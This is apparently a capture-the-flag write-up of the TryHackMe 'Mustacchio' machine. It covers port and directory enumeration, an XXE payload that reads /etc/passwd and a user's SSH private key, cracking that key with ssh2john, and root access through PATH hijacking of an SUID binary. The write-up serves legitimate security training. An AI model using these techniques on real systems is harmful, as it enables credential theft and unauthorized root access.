TryHackMe - Mustacchio
Here is Strupo_'s write-up for an "Easy boot2root Machine" called Mustacchio, by zyeinn, on TryHackMe.com.
The challenge was solved by conducting some basic enumeration, exploiting an XXE injection vulnerability, cracking a password, and leveraging an SUID binary to root the system.
To begin, nmap was used to determine open ports:
$ nmap -p- --open -sV -v -Pn -oA nmap-mustacchio 10.10.81.167
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
8765/tcp open http nginx 1.10.3 (Ubuntu)
Manually browsing to the web servers revealed a mustache based blog on 80/tcp and an admin login prompt hosted on 8765/tcp as seen below:
Admin Panel Login
Next, ffuf was used to enumerate content on the web server:
$ ffuf -u http://10.10.81.167/FUZZ -w /usr/share/wordlists/dirb/big.txt
.htaccess [Status: 403, Size: 277, Words: 20, Lines: 10]
.htpasswd [Status: 403, Size: 277, Words: 20, Lines: 10]
custom [Status: 301, Size: 313, Words: 20, Lines: 10]
fonts [Status: 301, Size: 312, Words: 20, Lines: 10]
images [Status: 301, Size: 313, Words: 20, Lines: 10]
robots.txt [Status: 200, Size: 28, Words: 3, Lines: 3]
server-status [Status: 403, Size: 277, Words: 20, Lines: 10]
:: Progress: [20470/20470] :: Job [1/1] :: 319 req/sec :: Duration: [0:01:04] :: Errors: 0 ::
There was not much to review under the /custom directory and so manually browsing to the resource and checking all of the contents quickly found the users.bak file:
A quick google search of the hash returned the cleartext password.
Obtaining User Access
The password was successfully used against the admin portal login page where large text entry box was observed. Looking at the HTML source code also revealed the following comments of interest:
<!-- Barry, you can now SSH in using your key!-->
//document.cookie = "Example=/auth/dontforget.bak";
The contents of /auth/dontforget.bak can be seen below:
$ cat dontforget.bak
<?xml version="1.0" encoding="UTF-8"?>
<com>his paragraph was a waste of time and space. If you had not read this and I had not typed this you and I could’ve done something more productive than reading this mindlessly and carelessly as if you did not have anything else to do in life. Life is so precious because it is short and you are being so careless that you do not realize it until now since this void paragraph mentions that you are doing something so mindless, so stupid, so careless that you realize that you are not using your time wisely. You could’ve been playing with your dog, or eating your cat, but no. You want to read this barren paragraph and expect something marvelous and terrific at the end. But since you still do not realize that you are wasting precious time, you still continue to read the null paragraph. If you had not noticed, you have wasted an estimated time of 20 seconds.</com>
This backup file was used as a template for an XXE injection proof-of-concept:<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [ <!ENTITY strupo SYSTEM "php://filter/read=bzip2.compress/read=convert.base64-encode/resource=/etc/passwd">]>
This successfully rendered the base64 encoded contents of /etc/passwd. The first comment mentioned using an SSH key so it was simply a matter of changing the resource value from /etc/passwd to "/home/barry/.ssh/id_rsa."
To turn the base64 blob to an actual key, I copied the encoded text to a file and used the following command: base64 -d -w0 < b64.id_rsa > id_rsa
The key was password protected and so ssh2john was leveraged to generate a hash that could be cracked by john or hashcat:
$ python ssh2john.py id_rsa > id_rsa.hash
-rw-r--r-- 1 barry barry 33 Jun 12 15:48 user.txt
drwxr-xr-x 2 barry barry 4096 Jun 12 15:48 .ssh
drwxr-xr-x 4 root root 4096 Jun 12 15:48 ..
drwx------ 2 barry barry 4096 Jun 13 03:10 .cache
drwxr-xr-x 4 barry barry 4096 Jun 13 03:10 .
barry@mustacchio:~$ cat user.txt
In order to elevate to root, I noticed an interesting looking binary in the /home/joe/ directory called "live_update." Using strings, I could see that it would simply tail -f the access.log file for the nginx web server.
Initially, I attempted to escape special character encoding and injecting control characters into the user-agent but this was a dead-end for me.
Next, I checked if it had the SUID bit set and it was! A quick way to spot check is ls -l and you can see the "s" in the permissions, but you can also do a system wide search by using find:
$ find / -perm -4000 2>/dev/null
I then did some searching just to make sure that there wasn't some simple way of dropping to a shell like you can with less but I didn't find anything. Then it occurred to me that if I could update my path to link tail to a binary that I specified, I should be able to root the box.
I did this by performing the following steps:
barry@mustacchio:~$ mkdir bin && cd bin
barry@mustacchio:~/bin$ export PATH=$HOME/bin:$PATH
barry@mustacchio:~/bin$ nano foo
barry@mustacchio:~/bin# cat foo
barry@mustacchio:~/bin$ chmod +x foo
barry@mustacchio:~/bin$ ln -s foo tail
root@mustacchio:~# cd /root
root@mustacchio:/root# ls -l
-rw------- 1 root root 33 Jun 12 15:48 root.txt
root@mustacchio:/root# cat root.txt
This was my first challenge hosted on TryHackMe.com and I really enjoyed it and the service. Signing-up was pain free and it was easy to just jump right into the challenge.Thanks for reading!
Find us on twitter: @teamWTG